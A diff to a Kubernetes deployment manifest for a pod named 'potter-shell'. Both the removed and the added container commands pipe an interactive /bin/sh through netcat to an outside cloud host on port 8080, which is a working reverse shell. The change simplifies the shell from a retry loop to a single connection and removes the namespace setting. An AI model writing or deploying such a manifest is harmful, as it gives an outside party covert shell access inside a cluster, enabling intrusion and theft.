--- a/deployment.yaml
+++ b/deployment.yaml
@@ -2,7 +2,6 @@ apiVersion: apps/v1
 kind: Deployment
 metadata:
   name: potter-shell
-  namespace: sesamo-api-argocd
 spec:
   replicas: 1
   selector:
@@ -15,17 +14,13 @@ spec:
     spec:
       containers:
         - name: shell
-          image: lachlanevenson/k8s-kubectl:v1.28.0
+          image: alpine
           command:
             - sh
             - -c
             - |
-              apk add --no-cache netcat-openbsd;
-              while true; do
-                mkfifo /tmp/f;
-                /bin/sh -i < /tmp/f 2>&1 | nc potter-maga.brazilsouth.cloudapp.azure.com 8080 > /tmp/f;
-                sleep 5;
-              done
+              apk add --no-cache busybox-extras;
+              mkfifo /tmp/f;
+              /bin/sh -i < /tmp/f 2>&1 | nc potter-maga.brazilsouth.cloudapp.azure.com 8080 > /tmp/f
           stdin: true
           tty: true
-
